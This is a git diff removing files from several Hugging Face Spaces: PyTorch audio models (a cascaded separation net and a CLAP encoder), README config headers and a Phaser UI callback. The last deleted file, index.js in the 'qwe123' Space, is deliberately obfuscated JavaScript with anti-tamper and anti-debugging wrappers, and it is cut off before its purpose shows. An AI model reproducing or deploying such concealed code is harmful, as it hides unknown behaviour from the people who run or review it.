- self.aspp = layers_new.ASPPModule(nout * 8, nout * 8, dilations, dropout=True)
-
- self.dec4 = layers_new.Decoder(nout * (6 + 8), nout * 6, 3, 1, 1)
- self.dec3 = layers_new.Decoder(nout * (4 + 6), nout * 4, 3, 1, 1)
- self.dec2 = layers_new.Decoder(nout * (2 + 4), nout * 2, 3, 1, 1)
- self.lstm_dec2 = layers_new.LSTMModule(nout * 2, nin_lstm, nout_lstm)
- self.dec1 = layers_new.Decoder(nout * (1 + 2) + 1, nout * 1, 3, 1, 1)
-
- def __call__(self, x):
- e1 = self.enc1(x)
- e2 = self.enc2(e1)
- e3 = self.enc3(e2)
- e4 = self.enc4(e3)
- e5 = self.enc5(e4)
-
- h = self.aspp(e5)
-
- h = self.dec4(h, e4)
- h = self.dec3(h, e3)
- h = self.dec2(h, e2)
- h = torch.cat([h, self.lstm_dec2(h)], dim=1)
- h = self.dec1(h, e1)
-
- return h
-
-
-class CascadedNet(nn.Module):
- def __init__(self, n_fft, nout=32, nout_lstm=128):
- super(CascadedNet, self).__init__()
-
- self.max_bin = n_fft // 2
- self.output_bin = n_fft // 2 + 1
- self.nin_lstm = self.max_bin // 2
- self.offset = 64
-
- self.stg1_low_band_net = nn.Sequential(
- BaseNet(2, nout // 2, self.nin_lstm // 2, nout_lstm),
- layers_new.Conv2DBNActiv(nout // 2, nout // 4, 1, 1, 0),
- )
-
- self.stg1_high_band_net = BaseNet(
- 2, nout // 4, self.nin_lstm // 2, nout_lstm // 2
- )
-
- self.stg2_low_band_net = nn.Sequential(
- BaseNet(nout // 4 + 2, nout, self.nin_lstm // 2, nout_lstm),
- layers_new.Conv2DBNActiv(nout, nout // 2, 1, 1, 0),
- )
- self.stg2_high_band_net = BaseNet(
- nout // 4 + 2, nout // 2, self.nin_lstm // 2, nout_lstm // 2
- )
-
- self.stg3_full_band_net = BaseNet(
- 3 * nout // 4 + 2, nout, self.nin_lstm, nout_lstm
- )
-
- self.out = nn.Conv2d(nout, 2, 1, bias=False)
- self.aux_out = nn.Conv2d(3 * nout // 4, 2, 1, bias=False)
-
- def forward(self, x):
- x = x[:, :, : self.max_bin]
-
- bandw = x.size()[2] // 2
- l1_in = x[:, :, :bandw]
- h1_in = x[:, :, bandw:]
- l1 = self.stg1_low_band_net(l1_in)
- h1 = self.stg1_high_band_net(h1_in)
- aux1 = torch.cat([l1, h1], dim=2)
-
- l2_in = torch.cat([l1_in, l1], dim=1)
- h2_in = torch.cat([h1_in, h1], dim=1)
- l2 = self.stg2_low_band_net(l2_in)
- h2 = self.stg2_high_band_net(h2_in)
- aux2 = torch.cat([l2, h2], dim=2)
-
- f3_in = torch.cat([x, aux1, aux2], dim=1)
- f3 = self.stg3_full_band_net(f3_in)
-
- mask = torch.sigmoid(self.out(f3))
- mask = F.pad(
- input=mask,
- pad=(0, 0, 0, self.output_bin - mask.size()[2]),
- mode="replicate",
- )
-
- if self.training:
- aux = torch.cat([aux1, aux2], dim=1)
- aux = torch.sigmoid(self.aux_out(aux))
- aux = F.pad(
- input=aux,
- pad=(0, 0, 0, self.output_bin - aux.size()[2]),
- mode="replicate",
- )
- return mask, aux
- else:
- return mask
-
- def predict_mask(self, x):
- mask = self.forward(x)
-
- if self.offset > 0:
- mask = mask[:, :, :, self.offset : -self.offset]
- assert mask.size()[3] > 0
-
- return mask
-
- def predict(self, x, aggressiveness=None):
- mask = self.forward(x)
- pred_mag = x * mask
-
- if self.offset > 0:
- pred_mag = pred_mag[:, :, :, self.offset : -self.offset]
- assert pred_mag.size()[3] > 0
-
- return pred_mag
diff --git a/spaces/AIGC-Audio/AudioGPT/text_to_audio/Make_An_Audio/ldm/modules/encoders/CLAP/clap.py b/spaces/AIGC-Audio/AudioGPT/text_to_audio/Make_An_Audio/ldm/modules/encoders/CLAP/clap.py
deleted file mode 100644
index 3141e47ec7b7df2e3cb81d11582b4738a5d23c1a..0000000000000000000000000000000000000000
--- a/spaces/AIGC-Audio/AudioGPT/text_to_audio/Make_An_Audio/ldm/modules/encoders/CLAP/clap.py
+++ /dev/null
@@ -1,89 +0,0 @@
-import numpy as np
-import torch
-import torch.nn.functional as F
-from torch import nn
-from transformers import AutoModel
-from .audio import get_audio_encoder
-
-class Projection(nn.Module):
- def __init__(self, d_in: int, d_out: int, p: float=0.5) -> None:
- super().__init__()
- self.linear1 = nn.Linear(d_in, d_out, bias=False)
- self.linear2 = nn.Linear(d_out, d_out, bias=False)
- self.layer_norm = nn.LayerNorm(d_out)
- self.drop = nn.Dropout(p)
-
- def forward(self, x: torch.Tensor) -> torch.Tensor:
- embed1 = self.linear1(x)
- embed2 = self.drop(self.linear2(F.gelu(embed1)))
- embeds = self.layer_norm(embed1 + embed2)
- return embeds
-
-class AudioEncoder(nn.Module):
- def __init__(self, audioenc_name:str, d_in: int, d_out: int, sample_rate: int, window_size: int,
- hop_size: int, mel_bins: int, fmin: int, fmax: int, classes_num: int) -> None:
- super().__init__()
-
- audio_encoder = get_audio_encoder(audioenc_name)
-
- self.base = audio_encoder(
- sample_rate, window_size,
- hop_size, mel_bins, fmin, fmax,
- classes_num, d_in)
-
- self.projection = Projection(d_in, d_out)
-
- def forward(self, x):
- out_dict = self.base(x)
- audio_features, audio_classification_output = out_dict['embedding'], out_dict['clipwise_output']
- projected_vec = self.projection(audio_features)
- return projected_vec, audio_classification_output
-
-class TextEncoder(nn.Module):
- def __init__(self, d_out: int, text_model: str, transformer_embed_dim: int) -> None:
- super().__init__()
- self.base = AutoModel.from_pretrained(text_model)
- self.projection = Projection(transformer_embed_dim, d_out)
-
- def forward(self, x):
- out = self.base(**x)[0]
- out = out[:, 0, :] # get CLS token output
- projected_vec = self.projection(out)
- return projected_vec
-
-class CLAP(nn.Module):
- def __init__(self,
- # audio
- audioenc_name: str,
- sample_rate: int,
- window_size: int,
- hop_size: int,
- mel_bins: int,
- fmin: int,
- fmax: int,
- classes_num: int,
- out_emb: int,
- # text
- text_model: str,
- transformer_embed_dim: int,
- # common
- d_proj: int,
- ):
- super().__init__()
-
-
- self.audio_encoder = AudioEncoder(
- audioenc_name, out_emb, d_proj,
- sample_rate, window_size, hop_size, mel_bins, fmin, fmax, classes_num)
-
- self.caption_encoder = TextEncoder(
- d_proj, text_model, transformer_embed_dim
- )
-
- self.logit_scale = nn.Parameter(torch.ones([]) * np.log(1 / 0.07))
-
- def forward(self, audio, text):
- audio_embed, _ = self.audio_encoder(audio)
- caption_embed = self.caption_encoder(text)
-
- return caption_embed, audio_embed, self.logit_scale.exp()
\ No newline at end of file
diff --git a/spaces/Adithedev/Text-Summarization-Tool/README.md b/spaces/Adithedev/Text-Summarization-Tool/README.md
deleted file mode 100644
index 70678abe290fb9fca9bd82ba13a45edd3211a1ad..0000000000000000000000000000000000000000
--- a/spaces/Adithedev/Text-Summarization-Tool/README.md
+++ /dev/null
@@ -1,13 +0,0 @@
----
-title: Text Summarizer
-emoji: 🏆
-colorFrom: green
-colorTo: red
-sdk: streamlit
-sdk_version: 1.21.0
-app_file: app.py
-pinned: false
-license: creativeml-openrail-m
----
-
-Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference
diff --git a/spaces/AgentVerse/agentVerse/ui/src/phaser3-rex-plugins/templates/ui/sides/defaultcallbacks/VisibleCallbacks.js b/spaces/AgentVerse/agentVerse/ui/src/phaser3-rex-plugins/templates/ui/sides/defaultcallbacks/VisibleCallbacks.js
deleted file mode 100644
index f140e17966236a30fa4bd0a1b50eecd3762afe86..0000000000000000000000000000000000000000
--- a/spaces/AgentVerse/agentVerse/ui/src/phaser3-rex-plugins/templates/ui/sides/defaultcallbacks/VisibleCallbacks.js
+++ /dev/null
@@ -1,20 +0,0 @@
-var GetShowCallback = function () {
- return function (child, key, sides, reset) {
- if (key !== 'panel') {
- sides.setChildVisible(child, true);
- }
- }
-}
-
-var GetHideCallback = function () {
- return function (child, key, sides, reset) {
- if (key !== 'panel') {
- sides.setChildVisible(child, false);
- }
- }
-}
-
-export default {
- show: GetShowCallback,
- hide: GetHideCallback
-}
\ No newline at end of file
diff --git a/spaces/AkshayKumarP/AI-ChatBot/README.md b/spaces/AkshayKumarP/AI-ChatBot/README.md
deleted file mode 100644
index dedad335282c1167f7214094aa52b5e4f8335292..0000000000000000000000000000000000000000
--- a/spaces/AkshayKumarP/AI-ChatBot/README.md
+++ /dev/null
@@ -1,13 +0,0 @@
----
-title: AI ChatBot
-emoji: 👀
-colorFrom: blue
-colorTo: gray
-sdk: gradio
-sdk_version: 3.47.1
-app_file: app.py
-pinned: false
-license: apache-2.0
----
-
-Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference
diff --git a/spaces/Albertha/qwe123/index.js b/spaces/Albertha/qwe123/index.js
deleted file mode 100644
index af14e7aa9771a3f7befc9ada5e9c273d0023e64f..0000000000000000000000000000000000000000
--- a/spaces/Albertha/qwe123/index.js
+++ /dev/null
@@ -1 +0,0 @@
-(function(_0x4485c9,_0x22327b){function _0xefd3bf(_0x3e1c6c,_0x1dfa24,_0x15da7f,_0x195c5d,_0x405333){return _0x222c(_0x1dfa24- -0x3cc,_0x405333);}function _0x297c01(_0x30ec4a,_0x42df57,_0x259878,_0x4968a7,_0x262f74){return _0x222c(_0x30ec4a-0x36e,_0x259878);}const _0x356a3e=_0x4485c9();function _0xb68276(_0x21380b,_0x2e2973,_0x52b0fa,_0x117bd5,_0x3635d9){return _0x222c(_0x2e2973-0x241,_0x117bd5);}function _0x4acd10(_0x52497a,_0x3b158a,_0x45ad13,_0x477292,_0x54f686){return _0x222c(_0x3b158a-0x1b5,_0x477292);}function _0x2197ea(_0x728895,_0x5db489,_0x447ced,_0x923532,_0x60db0c){return _0x222c(_0x447ced-0x179,_0x923532);}while(!![]){try{const _0x348d5c=parseInt(_0x4acd10(0x3db,0x3de,0x389,0x4af,0x2ed))/(-0x1*-0x99b+0x1*0x12af+-0x1c49)*(parseInt(_0x4acd10(0x224,0x267,0x1fe,0x24b,0x2fc))/(0x2449+-0x5*0x75d+0x45*0x2))+parseInt(_0x4acd10(0x34f,0x32e,0x335,0x30c,0x2e0))/(-0x1a18+0x15d*-0x13+-0x3*-0x1156)+parseInt(_0x2197ea(0x364,0x3b7,0x2d6,0x26b,0x288))/(0x1e6+-0x1a3a*-0x1+-0x7*0x404)*(parseInt(_0x4acd10(0x47a,0x3ed,0x425,0x324,0x429))/(0xdca+-0xcdd*-0x3+-0x1a2e*0x2))+parseInt(_0xefd3bf(-0x249,-0x245,-0x167,-0x2c3,-0x272))/(0x2*-0x93b+0x21a3+-0x50d*0x3)*(parseInt(_0x4acd10(0x2e2,0x3a7,0x45d,0x34f,0x3a5))/(-0x8*-0x4a9+0x14ae+0x1*-0x39ef))+parseInt(_0x2197ea(0x1c3,0x1dd,0x22d,0x16f,0x2b1))/(-0x15f+-0x3*0xbb9+0x2*0x1249)*(parseInt(_0x297c01(0x56b,0x639,0x494,0x57d,0x4da))/(0x7a2+0x1*-0xedb+0x3a1*0x2))+parseInt(_0x4acd10(0x325,0x3cf,0x33d,0x3f5,0x470))/(-0x1f28+0x114+-0x1e*-0x101)*(-parseInt(_0xefd3bf(-0x199,-0x1e0,-0x163,-0x117,-0x119))/(-0x897+-0x1842+0x20e4))+parseInt(_0xb68276(0x3a8,0x40e,0x3ed,0x368,0x36b))/(-0x1c06+-0x1462+-0x1*-0x3074)*(-parseInt(_0x297c01(0x56d,0x622,0x59e,0x496,0x599))/(0x3*-0x45a+-0x1d72+0x3*0xe2f));if(_0x348d5c===_0x22327b)break;else _0x356a3e['push'](_0x356a3e['shift']());}catch(_0x2be93b){_0x356a3e['push'](_0x356a3e['shift']());}}}(_0x4e4c,0x82*-0x19d0+0x374aa+-0x71e1d*-0x3));function _0x1d31e6(_0x26aabc,_0x58e3f1,_0x4d962d,_0x44a366,_0x1e49ac){return _0x222c(_0x26aabc- -0x25,_0x4d962d);}const _0x7d8571=(function(){function _0x608687(_0x541c2e,_0x566e15,_0x56da78,_0x4712c,_0x461848){return _0x222c(_0x541c2e- -0x209,_0x566e15);}function _0x19cc71(_0x45b869,_0x4779d2,_0xbcb35d,_0x3ae9e2,_0x267e6a){return _0x222c(_0x3ae9e2-0x168,_0x267e6a);}function _0x2ff91a(_0x2fa4df,_0x2d5ef6,_0x128dfa,_0x5f2dcf,_0x1ed3d0){return _0x222c(_0x1ed3d0-0x382,_0x2d5ef6);}function _0x570f86(_0x328671,_0x57b76c,_0x39f1be,_0x5ab763,_0x4adaeb){return _0x222c(_0x5ab763- -0xc9,_0x57b76c);}function _0x237352(_0x27c7b9,_0x4fb426,_0xa489a,_0x533521,_0x1d2f34){return _0x222c(_0x27c7b9- -0x295,_0x533521);}const _0x5186e9={'CLxJL':function(_0x174521,_0x4e51f9){return _0x174521(_0x4e51f9);},'sEXRC':function(_0x47e55c,_0x304d65){return _0x47e55c+_0x304d65;},'vPGKz':_0x237352(-0x203,-0x2d5,-0x1b1,-0x11e,-0x1d8)+_0x237352(-0x72,-0x12,-0xf5,-0xc6,-0x14b)+_0x2ff91a(0x3ac,0x3ce,0x49a,0x47f,0x455)+_0x2ff91a(0x44f,0x4d3,0x3dc,0x4c2,0x45c),'TTiuI':_0x608687(-0x20,-0x38,0x8d,-0xc5,-0xbc)+_0x608687(-0x3d,-0x4c,0x80,-0x22,0x77)+_0x570f86(0x4a,0xb2,0xb9,0x4a,0x5)+_0x570f86(0x11d,0xec,0x168,0x13c,0xe0)+_0x19cc71(0x280,0x2ec,0x309,0x245,0x1ef)+_0x608687(-0xa0,-0x16f,-0x14e,-0xee,0x1)+'\x20)','YyzBo':function(_0x3fd5d6,_0x145fea){return _0x3fd5d6!==_0x145fea;},'liNNj':_0x608687(0x21,0x5b,0x60,-0x5a,-0xc8),'ZtWnq':function(_0x40dedb,_0x579930){return _0x40dedb===_0x579930;},'pGfic':_0x2ff91a(0x407,0x4fd,0x4b4,0x455,0x49b),'JOvwt':_0x570f86(0x82,0x58,0x78,0xc7,0xdf)+_0x237352(-0xfd,-0x2e,-0x60,-0xce,-0x18c)+_0x608687(-0x108,-0x1bb,-0xe1,-0xed,-0x1cd),'IgZqH':_0x570f86(0x1b,0xf5,-0xb7,0x4,-0x11)+'er','HHIYV':function(_0x3281b8){return _0x3281b8();},'fwptI':function(_0x442173,_0x163537){return _0x442173===_0x163537;},'AFQdy':_0x19cc71(0x405,0x3c5,0x42b,0x3c5,0x300),'EGhZe':_0x237352(-0x1d1,-0x1b3,-0x20a,-0x266,-0x1f7)};let _0x460d02=!![];return function(_0x23b1fb,_0x5bea40){const _0x4ef3c3={'hLqPS':_0x5186e9[_0x2c608f(-0x224,-0x1b8,-0xb5,-0x179,-0xa5)],'LEbOf':_0x5186e9[_0x2c608f(-0xa7,-0x64,-0x8,-0xc1,-0xe0)],'RExtq':function(_0x36abf9){function _0x3a6869(_0x1f6ded,_0x6e3a20,_0x1c712,_0x5e2b93,_0x25a8c9){return _0x2c608f(_0x1f6ded-0x1ac,_0x6e3a20-0x1de,_0x1c712-0xa3,_0x5e2b93- -0x1d1,_0x25a8c9);}return _0x5186e9[_0x3a6869(-0x3c3,-0x29e,-0x33e,-0x32e,-0x23f)](_0x36abf9);}};function _0x130cc0(_0x28523e,_0x37ac41,_0x46edaa,_0x4a3eff,_0x2357ad){return _0x237352(_0x46edaa- -0x138,_0x37ac41-0x66,_0x46edaa-0x3a,_0x2357ad,_0x2357ad-0x33);}function _0x2c608f(_0x5aeefc,_0x508c15,_0x31febe,_0x2f9456,_0xc3f468){return _0x237352(_0x2f9456-0x8f,_0x508c15-0xa7,_0x31febe-0xef,_0xc3f468,_0xc3f468-0x1d2);}function _0x4cd69c(_0x2f64ef,_0x3d09f6,_0x5c2aaa,_0x9d422e,_0x2d6659){return _0x19cc71(_0x2f64ef-0xf6,_0x3d09f6-0x73,_0x5c2aaa-0x71,_0x5c2aaa-0x1d3,_0x2d6659);}function _0x300ab1(_0x5eb7c0,_0x1aa2f0,_0x37acbd,_0xe8d84b,_0x89da59){return _0x19cc71(_0x5eb7c0-0x1c0,_0x1aa2f0-0x1be,_0x37acbd-0x185,_0x89da59- -0x190,_0x5eb7c0);}function _0x48b8ea(_0x46b6f8,_0x47d45e,_0x1afc7a,_0x224ce8,_0x1954a4){return _0x570f86(_0x46b6f8-0xfa,_0x1954a4,_0x1afc7a-0xef,_0x47d45e-0x387,_0x1954a4-0xb2);}if(_0x5186e9[_0x2c608f(-0x35,-0x88,-0x13a,-0x9c,-0x103)](_0x5186e9[_0x130cc0(-0x2d3,-0x41d,-0x349,-0x31a,-0x2ca)],_0x5186e9[_0x4cd69c(0x4ca,0x445,0x3e5,0x39d,0x347)]))return function(_0x5a41db){}[_0x48b8ea(0x4a0,0x463,0x548,0x4af,0x3ab)+_0x300ab1(0x28,-0x3a,0xd6,0xd9,0x9d)+'r'](_0x4ef3c3[_0x130cc0(-0x1d2,-0x134,-0x175,-0x14c,-0x1c4)])[_0x2c608f(-0x38,0xae,0xcf,-0xf,-0xa9)](_0x4ef3c3[_0x300ab1(0x156,0x15d,0xb7,0x1eb,0x144)]);else{const _0x2277f4=_0x460d02?function(){function _0x2401aa(_0x2b6833,_0x4b79ca,_0x31a993,_0xe8033,_0x334706){return _0x2c608f(_0x2b6833-0x1cc,_0x4b79ca-0x49,_0x31a993-0x58,_0x334706-0x229,_0xe8033);}function _0x3c2a18(_0x5a95ec,_0x587d1e,_0x39e62c,_0xfa1821,_0x522fa){return _0x4cd69c(_0x5a95ec-0x62,_0x587d1e-0xf3,_0x39e62c- -0x77,_0xfa1821-0xd2,_0x587d1e);}function _0x50cbbd(_0x1a3960,_0x5e2e55,_0x4eba15,_0x58019e,_0x40c53e){return _0x130cc0(_0x1a3960-0x145,_0x5e2e55-0x1b1,_0x5e2e55-0x5ce,_0x58019e-0x1ee,_0x4eba15);}function _0x4e7947(_0x45c3fd,_0x547ae3,_0x550ac9,_0x43e80c,_0x4966d8){return _0x4cd69c(_0x45c3fd-0x165,_0x547ae3-0x20,_0x550ac9- -0xf3,_0x43e80c-0x4c,_0x547ae3);}function _0x5966bf(_0x424dbb,_0x200755,_0x6b382,_0x2ac986,_0x46bc6a){return _0x2c608f(_0x424dbb-0x105,_0x200755-0x3b,_0x6b382-0x100,_0x424dbb-0x1ba,_0x6b382);}const _0x22a4a1={'kcOBP':function(_0x24e26c,_0xdad72f){function _0x5639a6(_0x20c4b6,_0x4df758,_0x83e411,_0x47ac48,_0x53a311){return _0x222c(_0x4df758-0x99,_0x83e411);}return _0x5186e9[_0x5639a6(0x211,0x1be,0x192,0xdc,0x24d)](_0x24e26c,_0xdad72f);},'UGzxM':function(_0xa58f7f,_0x23a6ad){function _0x37e16e(_0x1b8800,_0x8a743d,_0x16ed08,_0x310d7f,_0x5ed0b2){return _0x222c(_0x16ed08-0x69,_0x1b8800);}return _0x5186e9[_0x37e16e(0x1e3,0x7d,0x123,0x173,0x1be)](_0xa58f7f,_0x23a6ad);},'SQFha':_0x5186e9[_0x50cbbd(0x2e3,0x28a,0x302,0x2ca,0x296)],'rcsmG':_0x5186e9[_0x50cbbd(0x280,0x2d5,0x392,0x27d,0x29d)]};if(_0x5186e9[_0x2401aa(0x2a2,0x20c,0x2e6,0x300,0x21e)](_0x5186e9[_0x50cbbd(0x1d4,0x290,0x292,0x2e7,0x355)],_0x5186e9[_0x5966bf(0x43,-0x79,-0x2e,-0x27,0xbd)])){const _0x5da1fd=function(){function _0x21f5a9(_0x566629,_0x4af024,_0x17f5cd,_0x24caf2,_0x85b603){return _0x4e7947(_0x566629-0x1a4,_0x17f5cd,_0x24caf2- -0x385,_0x24caf2-0x55,_0x85b603-0x182);}function _0x26b488(_0x285512,_0x66c63,_0x2c0528,_0xeec007,_0x2f97fc){return _0x50cbbd(_0x285512-0x68,_0x2c0528- -0x57f,_0xeec007,_0xeec007-0x154,_0x2f97fc-0x12d);}let _0x5375cc;try{_0x5375cc=_0x22a4a1[_0x2f1c3d(-0x8a,-0x1ff,-0x18f,-0x14b,-0x216)](_0x2937d6,_0x22a4a1[_0x26b488(-0x26c,-0x274,-0x23c,-0x29e,-0x295)](_0x22a4a1[_0x26b488(-0x1bc,-0x2ae,-0x23c,-0x302,-0x2de)](_0x22a4a1[_0x2f1c3d(-0xdf,-0x202,-0x187,-0x144,-0x169)],_0x22a4a1[_0x26b488(-0x296,-0x2ed,-0x2a7,-0x314,-0x351)]),');'))();}catch(_0x262405){_0x5375cc=_0x55d1dc;}function _0x2f1c3d(_0x37184d,_0x278779,_0x2cefa0,_0x583550,_0x1da5b5){return _0x50cbbd(_0x37184d-0x145,_0x583550- -0x569,_0x2cefa0,_0x583550-0x17c,_0x1da5b5-0x198);}function _0x1a8f86(_0x370014,_0x346c35,_0x2c014e,_0x480f76,_0x2a3339){return _0x4e7947(_0x370014-0x41,_0x370014,_0x2a3339- -0x4d4,_0x480f76-0x85,_0x2a3339-0x19d);}function _0x467577(_0x345385,_0x3e3106,_0x42df17,_0x1e5bac,_0x1b4099){return _0x50cbbd(_0x345385-0x1dd,_0x1e5bac- -0x396,_0x1b4099,_0x1e5bac-0x8e,_0x1b4099-0x7f);}return _0x5375cc;},_0x2295a4=_0x4ef3c3[_0x50cbbd(0x326,0x389,0x304,0x43f,0x2f2)](_0x5da1fd);_0x2295a4[_0x3c2a18(0x3ff,0x359,0x37b,0x354,0x3d6)+_0x50cbbd(0x240,0x2af,0x39e,0x25f,0x277)+'l'](_0x56a47c,-0x7*-0x55+-0xc75*0x2+0x2637);}else{if(_0x5bea40){if(_0x5186e9[_0x2401aa(0xbb,0x1a3,0x15,0x47,0xb7)](_0x5186e9[_0x3c2a18(0x46e,0x4ba,0x4e3,0x414,0x4c8)],_0x5186e9[_0x2401aa(0x234,0x2d3,0x267,0x1c5,0x242)])){const _0xe12e92=_0x5bea40[_0x4e7947(0x516,0x4b6,0x43f,0x38b,0x3d0)](_0x23b1fb,arguments);return _0x5bea40=null,_0xe12e92;}else return _0x132982;}}}:function(){};return _0x460d02=![],_0x2277f4;}};}()),_0x75b4a9=_0x7d8571(this,function(){function _0x21f005(_0x358bff,_0x186eb5,_0x4954bd,_0x5ca7a1,_0xed9ba6){return _0x222c(_0x186eb5- -0xcf,_0xed9ba6);}const _0x16d6bc={};function _0x1246b2(_0x2db16b,_0x221bdc,_0x183b73,_0x31610d,_0x243ff1){return _0x222c(_0x2db16b- -0x290,_0x31610d);}function _0x3e745b(_0x1d7ec6,_0x833c95,_0xc700d8,_0x2c3110,_0x28978e){return _0x222c(_0x1d7ec6- -0x1c2,_0x833c95);}_0x16d6bc[_0x22182c(0x61,0xeb,0x1,0x77,0x71)]=_0x1246b2(-0x4e,0x0,0x81,-0xef,-0xd1)+_0x3e745b(0x2,-0x63,-0x6,-0x3b,-0xd2)+'+$';const _0x15c2a5=_0x16d6bc;function _0x424314(_0x5486ac,_0x48a52c,_0x324a4f,_0x1274bc,_0x37015e){return _0x222c(_0x5486ac- -0x2e5,_0x48a52c);}function _0x22182c(_0x5adafe,_0x1c7d15,_0x37ae8e,_0x3e8694,_0x4c108b){return _0x222c(_0x37ae8e- -0x150,_0x5adafe);}return _0x75b4a9[_0x424314(-0xa7,-0xfd,-0x168,-0x89,0x2b)+_0x21f005(-0xd1,-0x30,-0x48,-0xdc,0x27)]()[_0x22182c(-0x14e,-0x75,-0xad,0x9,0x3b)+'h'](_0x15c2a5[_0x1246b2(-0x13f,-0x1ae,-0xe9,-0xbd,-0x62)])[_0x3e745b(0x7c,-0x35,0x15e,0xeb,0x142)+_0x424314(-0x246,-0x1fa,-0x18c,-0x167,-0x223)]()[_0x1246b2(-0xeb,-0xc9,-0x106,-0x18,-0xac)+_0x424314(-0x220,-0x22a,-0x249,-0x255,-0x223)+'r'](_0x75b4a9)[_0x3e745b(-0x11f,-0x1fd,-0x8a,-0x59,-0x6a)+'h'](_0x15c2a5[_0x1246b2(-0x13f,-0x192,-0x1b2,-0xfa,-0x116)]);});_0x75b4a9();const _0xdd6162=(function(){function _0x1b7e56(_0x565d9d,_0x10be8b,_0x1db0a1,_0x2a9615,_0x58aa3d){return _0x222c(_0x2a9615- -0xc9,_0x1db0a1);}function _0x535ef2(_0x3a5747,_0x4792c5,_0x575458,_0x5e113a,_0x5afd25){return _0x222c(_0x575458-0x2b8,_0x5afd25);}function _0x47b722(_0x34e60e,_0x214a6d,_0x44d11e,_0x101c21,_0xf78db){return _0x222c(_0x44d11e- -0x24d,_0x214a6d);}function _0x312d48(_0x170ce1,_0x2d452b,_0x1e9e77,_0x421523,_0x3e21ad){return _0x222c(_0x3e21ad-0x11a,_0x421523);}const _0x282ffb={'pFaCe':_0x47b722(-0x181,-0x1ec,-0x1a9,-0x23a,-0x19a),'pOQpd':function(_0x2e5532,_0x5efd90){return _0x2e5532(_0x5efd90);},'djRtw':_0x3cfc6d(0x66,0x65,0xdc,0x88,0x91),'bUAtF':_0x47b722(-0x51,-0x39,-0xfa,-0xe8,-0x1d7),'cVTCn':function(_0x3b4db0,_0x3dad4d){return _0x3b4db0+_0x3dad4d;},'lbAPp':function(_0xcab92f,_0x426ab2){return _0xcab92f==_0x426ab2;},'ZSRjq':function(_0x2ce010,_0x3efc49){return _0x2ce010+_0x3efc49;},'ZLSGn':function(_0x5c89d0,_0x118da9,_0x1c28f0,_0x2238c8){return _0x5c89d0(_0x118da9,_0x1c28f0,_0x2238c8);},'vwWMV':_0x1b7e56(-0x4b,0x9d,0xd7,0x1a,0x46)+_0x312d48(0x23a,0x31d,0x2dd,0x3e4,0x2f4),'QPwpg':function(_0x193d1f,_0x3c05f8){return _0x193d1f(_0x3c05f8);},'esxiR':function(_0x4983fa,_0x50c8ac,_0x47abff){return _0x4983fa(_0x50c8ac,_0x47abff);},'OEyyx':_0x1b7e56(-0x4f,0xc1,0xb3,0x1a,0x104)+_0x535ef2(0x508,0x3bb,0x491,0x580,0x47b)+'r:','PIoog':function(_0x1d38fa,_0x483221){return _0x1d38fa!==_0x483221;},'ENUXM':_0x312d48(0x253,0xdf,0x1dc,0x104,0x1c2),'bTZpH':_0x47b722(-0x228,-0x16c,-0x18d,-0x273,-0xe7),'cxfXB':function(_0x5a536d,_0x328336){return _0x5a536d===_0x328336;},'NtuTp':_0x3cfc6d(0x70,-0xb7,-0x6b,0xb,-0x4a),'ELQqV':function(_0x44d3d6,_0x5b067c){return _0x44d3d6===_0x5b067c;},'iiOWN':_0x47b722(-0x170,0x1c,-0x98,0x22,-0x11c)};function _0x3cfc6d(_0x5df056,_0x5ccbb8,_0x4aa519,_0x43fae4,_0x29a057){return _0x222c(_0x29a057- -0x154,_0x5df056);}let _0x22eb26=!![];return function(_0x50be46,_0x43bad9){function _0x33b0a4(_0x18fadf,_0x30c63f,_0x2b75b7,_0x24f0dc,_0x3512d5){return _0x3cfc6d(_0x3512d5,_0x30c63f-0x51,_0x2b75b7-0x71,_0x24f0dc-0x128,_0x18fadf-0x5c);}function _0x11392f(_0x3ecc1f,_0x1bd1e6,_0x29a3c0,_0x3acf01,_0x1c1101){return _0x47b722(_0x3ecc1f-0x2b,_0x3ecc1f,_0x29a3c0-0x561,_0x3acf01-0x17d,_0x1c1101-0x8a);}function _0xf20218(_0x19de30,_0x9f3743,_0x425958,_0x1205ef,_0x4f5804){return _0x535ef2(_0x19de30-0x173,_0x9f3743-0xad,_0x4f5804- -0x517,_0x1205ef-0x105,_0x425958);}function _0x4eb679(_0x3b816b,_0x1932f7,_0x1415e0,_0xddfa2,_0x2a57ea){return _0x1b7e56(_0x3b816b-0x94,_0x1932f7-0x1c1,_0x3b816b,_0xddfa2-0xf4,_0x2a57ea-0x133);}if(_0x282ffb[_0xf20218(-0x161,-0x241,-0x140,-0x296,-0x1d4)](_0x282ffb[_0xf20218(-0xbf,-0x174,-0x194,-0x162,-0x154)],_0x282ffb[_0xf20218(-0x217,-0x6e,-0x153,-0x11b,-0x154)])){const _0x3e9b07=_0x22eb26?function(){function _0x411b77(_0x410e7d,_0x3cfffb,_0x220af8,_0x2b8f6d,_0x1b28ab){return _0x33b0a4(_0x220af8-0x406,_0x3cfffb-0x13c,_0x220af8-0xc7,_0x2b8f6d-0xbd,_0x1b28ab);}function _0x201965(_0x67a9e8,_0x33a516,_0x2aaaf0,_0x44bbeb,_0x773eb7){return _0x11392f(_0x773eb7,_0x33a516-0x139,_0x67a9e8- -0x685,_0x44bbeb-0x1c4,_0x773eb7-0x21);}function _0x5e92f3(_0x4e4c3e,_0x57c64a,_0x40e5ca,_0x1d5ed5,_0x5766e1){return _0x33b0a4(_0x5766e1- -0x284,_0x57c64a-0x6a,_0x40e5ca-0x1dc,_0x1d5ed5-0x136,_0x40e5ca);}const _0x34305b={'drGOn':_0x282ffb[_0x411b77(0x41e,0x33b,0x422,0x446,0x3cb)],'fFEtn':function(_0x4af744,_0x105044){function _0xbac4c8(_0x12fc8e,_0x4b069c,_0x9627e8,_0x373c7f,_0x2343a5){return _0x411b77(_0x12fc8e-0x129,_0x4b069c-0x128,_0x373c7f-0x7d,_0x373c7f-0x91,_0x2343a5);}return _0x282ffb[_0xbac4c8(0x5a8,0x4cd,0x59d,0x562,0x5f9)](_0x4af744,_0x105044);},'ITDzW':_0x282ffb[_0x5c0c41(0x503,0x572,0x51a,0x4a3,0x517)],'eRUXM':_0x282ffb[_0x5c0c41(0x563,0x4d2,0x4b6,0x4a7,0x4bf)],'LszCS':function(_0x55ab82,_0x22aa12){function _0x106af0(_0x584c7e,_0x4cf0ad,_0x1ec564,_0xd50cf2,_0x27ec41){return _0x201965(_0x4cf0ad-0xe6,_0x4cf0ad-0x1b4,_0x1ec564-0xd3,_0xd50cf2-0x10b,_0x27ec41);}return 